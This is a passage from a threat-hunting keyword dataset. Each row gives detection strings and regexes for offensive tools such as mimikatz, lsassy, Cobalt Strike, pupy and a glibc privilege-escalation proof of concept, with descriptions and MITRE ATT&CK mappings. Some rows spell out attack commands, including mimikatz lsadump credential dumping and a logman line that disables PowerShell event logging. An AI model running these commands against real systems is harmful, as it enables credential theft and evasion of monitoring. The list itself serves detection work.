T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*LockLess.exe*",".{0,1000}LockLess\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Locksmith-main.zip*",".{0,1000}Locksmith\-main\.zip.{0,1000}","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","7","685","65","2024-04-23T15:48:48Z","2022-04-28T01:37:32Z" "*log4_shell.rb*",".{0,1000}log4_shell\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*log4shell*.nessus.org*",".{0,1000}log4shell.{0,1000}\.nessus\.org.{0,1000}","offensive_tool_keyword","nessus","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://fr.tenable.com/products/nessus","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*log4shell.py*",".{0,1000}log4shell\.py.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*Logging key presses... ctrl-c to quit*",".{0,1000}Logging\skey\spresses\.\.\.\sctrl\-c\sto\squit.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","0","N/A","10","1","3","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z" "*logging.getLogger(""nemesis"")*",".{0,1000}logging\.getLogger\(\""nemesis\""\).{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*LoGiC.NET.exe*",".{0,1000}LoGiC\.NET\.exe.{0,1000}","offensive_tool_keyword","LoGiC.NET","A more advanced free and open .NET obfuscator using dnlib","T1001","TA0011","N/A","N/A","Defense Evasion","https://github.com/AnErrupTion/LoGiC.NET","1","1","N/A","5","6","506","78","2023-08-23T09:55:54Z","2019-12-27T09:48:50Z" "*login.php?LOGMEOUTPLZ=true*",".{0,1000}login\.php\?LOGMEOUTPLZ\=true.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","10","10","206","43","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z" "*login-securite/lsassy*",".{0,1000}login\-securite\/lsassy.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","1","N/A","10","10","1911","239","2024-04-18T05:56:30Z","2019-12-03T14:03:41Z" "*loginsight.thrift*",".{0,1000}loginsight\.thrift.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*logman update trace EventLog-Application --p Microsoft-Windows-PowerShell -ets*",".{0,1000}logman\supdate\strace\sEventLog\-Application\s\-\-p\sMicrosoft\-Windows\-PowerShell\s\-ets.{0,1000}","offensive_tool_keyword","logman","disables Microsoft-Windows-PowerShell event logging until a reboot occurs or the attacker restores the ETW provider","T1562.004 - T1070.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*LogonPasswords\*-LogonPasswords.txt*",".{0,1000}LogonPasswords\\.{0,1000}\-LogonPasswords\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*LogonPasswords\.AllUniqueNTLM.txt*",".{0,1000}LogonPasswords\\\.AllUniqueNTLM\.txt.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*LogonTracer*",".{0,1000}LogonTracer.{0,1000}","offensive_tool_keyword","LogonTracer","LogonTracer is a tool to investigate malicious logon by visualizing and analyzing Windows Active Directory event logs. This tool associates a host name (or an IP address) and account name found in logon-related events and displays it as a graph. This way. it is possible to see in which account login attempt occurs and which host is used.","T1057 - T1087 - T1208","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/JPCERTCC/LogonTracer","1","0","N/A","6","10","2628","440","2024-03-25T11:44:14Z","2017-11-24T06:07:49Z" "*logs/maitm.log""*",".{0,1000}logs\/maitm\.log\"".{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*logs/Responder-Session.log*",".{0,1000}logs\/Responder\-Session\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logs/ridenum.log*",".{0,1000}logs\/ridenum\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logs/shares-with-SCF.txt*",".{0,1000}logs\/shares\-with\-SCF\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logs/theHarvester.py.log*",".{0,1000}logs\/theHarvester\.py\.log.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*logToBeaconLog*",".{0,1000}logToBeaconLog.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*LOLBAS-Project*",".{0,1000}LOLBAS\-Project.{0,1000}","offensive_tool_keyword","LOLBAS-Project","Living Off The Land Binaries and Scripts (and also Libraries) malicious use of legitimate tool","T1072 - T1059.003 - T1059.004 - T1059.001 - T1059.005 - T1564.001","TA0002 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://lolbas-project.github.io/","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*lolbin.exe *",".{0,1000}lolbin\.exe\s.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*LOLBins/NetLoader.xml*",".{0,1000}LOLBins\/NetLoader\.xml.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","1","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*Lolipop.php - Edited By KingDefacer*",".{0,1000}Lolipop\.php\s\-\sEdited\sBy\sKingDefacer.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*LOLSpoof.exe*",".{0,1000}LOLSpoof\.exe.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","1","N/A","8","2","140","18","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z" "*Londor.exe -t Coverage*",".{0,1000}Londor\.exe\s\-t\sCoverage.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*Londor.exe -t Script*",".{0,1000}Londor\.exe\s\-t\sScript.{0,1000}","offensive_tool_keyword","Sharp-Suite","C# offensive tools","T1027 - T1059.001 - T1562.001 - T1136.001","TA0004 - TA0005 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite","1","0","N/A","N/A","10","1088","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" "*looCiprian/GC2-sheet*",".{0,1000}looCiprian\/GC2\-sheet.{0,1000}","offensive_tool_keyword","GC2-sheet","GC2 is a Command and Control application that allows an attacker to execute commands on the target machine using Google Sheet and exfiltrate data using Google Drive.","T1071.002 - T1560 - T1105","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/looCiprian/GC2-sheet","1","1","N/A","10","10","485","98","2024-04-01T15:33:47Z","2021-09-15T19:06:12Z" "*lookupsid.py -hashes :* *@* 0*",".{0,1000}lookupsid\.py\s\-hashes\s\:.{0,1000}\s.{0,1000}\@.{0,1000}\s0.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*lookupsid.py*",".{0,1000}lookupsid\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*looneypwner.sh *",".{0,1000}looneypwner\.sh\s.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","0","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*LooneyPwner-main*",".{0,1000}LooneyPwner\-main.{0,1000}","offensive_tool_keyword","POC","Exploit tool for CVE-2023-4911 targeting the 'Looney Tunables' glibc vulnerability in various Linux distributions.","T1068 - T1210 - T1555","TA0001 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/chaudharyarjun/LooneyPwner","1","1","N/A","10","1","38","12","2023-10-18T04:59:50Z","2023-10-17T07:44:16Z" "*loot_memory.py*",".{0,1000}loot_memory\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*LordNoteworthy*",".{0,1000}LordNoteworthy.{0,1000}","offensive_tool_keyword","Github Username","Github username of hacker known for malware pocs and windows exploitations","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/LordNoteworthy","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Lost connection to team server! Sleeping 60 second and retrying?*",".{0,1000}Lost\sconnection\sto\steam\sserver!\sSleeping\s60\ssecond\sand\sretrying\?.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","10","10","504","70","2024-01-29T16:39:40Z","2024-01-02T00:18:44Z" "*lotus2john.py*",".{0,1000}lotus2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Lovely-Potato*",".{0,1000}Lovely\-Potato.{0,1000}","offensive_tool_keyword","Lovely-Potato","Lovely Potato (automating juicy potato) Powershell wrapper of Decoders JuicyPotato for easy exploitation. This entirely depends on the original Juicy Potato binary and utilizes his test_clsid.bat. another Local Privilege Escalation tool. from a Windows Service Accounts to NT AUTHORITY\SYSTEM","T1055 - T1547.002 - T1543.003 - T1059.001","TA0004 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/TsukiCTF/Lovely-Potato","1","0","N/A","10","2","138","29","2021-07-21T18:09:14Z","2019-05-17T19:37:20Z" "*lpfcbjknijpeeillifnkikgncikgfhdo*",".{0,1000}lpfcbjknijpeeillifnkikgncikgfhdo.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*ls -la netkit.ko*",".{0,1000}ls\s\-la\snetkit\.ko.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","10","1","17","3","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z" "*L'S', L'e', L'D', L'e', L'b', L'u', L'g', L'P', L'r', L'i', L'v', L'i', L'l', L'e', L'g', L'e'*",".{0,1000}L\'S\',\sL\'e\',\sL\'D\',\sL\'e\',\sL\'b\',\sL\'u\',\sL\'g\',\sL\'P\',\sL\'r\',\sL\'i\',\sL\'v\',\sL\'i\',\sL\'l\',\sL\'e\',\sL\'g\',\sL\'e\'.{0,1000}","offensive_tool_keyword","LetMeowIn","A sophisticated covert Windows-based credential dumper using C++ and MASM x64.","T1003 - T1055.011 - T1148","TA0006","N/A","N/A","Credential Access","https://github.com/Meowmycks/LetMeowIn","1","0","N/A","10","3","263","44","2024-04-20T03:59:46Z","2024-04-09T16:33:27Z" "*lsa_decryptor.py*",".{0,1000}lsa_decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*lsa_decryptor_nt*.py*",".{0,1000}lsa_decryptor_nt.{0,1000}\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*lsa_secrets.md*",".{0,1000}lsa_secrets\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*lsadump.exe*",".{0,1000}lsadump\.exe.{0,1000}","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1075","161","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" "*lsadump::*",".{0,1000}lsadump\:\:.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz exploitation command","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::backupkeys*",".{0,1000}lsadump\:\:backupkeys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::cache*",".{0,1000}lsadump\:\:cache.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::changentlm*",".{0,1000}lsadump\:\:changentlm.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::dcshadow*",".{0,1000}lsadump\:\:dcshadow.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::dcsyn*",".{0,1000}lsadump\:\:dcsync.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::lsa*",".{0,1000}lsadump\:\:lsa.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*lsadump::mbc*",".{0,1000}lsadump\:\:mbc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. 